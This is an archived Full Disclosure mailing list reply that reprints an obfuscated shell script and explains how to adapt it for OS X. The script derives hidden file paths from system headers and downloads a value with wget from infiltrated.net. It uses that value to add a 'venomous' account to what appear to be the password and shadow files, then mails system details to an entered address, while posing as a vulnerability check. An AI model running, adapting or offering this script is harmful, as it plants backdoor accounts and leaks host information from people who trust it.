Full Disclosure mailing list archives

Re: Linux big bang theory....


From: Valdis.Kletnieks () vt edu
Date: Sun, 13 May 2007 22:43:36 -0400

On Mon, 14 May 2007 08:47:39 +0800, Just1n T1mberlake said:
Confirmed Macosx is not vulnerable to this.

Not this variant, anyhow.  Note that if you go digging around, you can
probably find other places to seed $happy, $days, $who, and $what from.

happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F ":" 
'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F 
":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, 
""){print $4" -a"}'`
echo "Enter your email address" ; read ans ; where=$ans
$who | $what $where

One carefully coded 'find ... | xargs egrep' will get you the needed info
to produce a version that will work on OSX.

Attachment: _bin
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: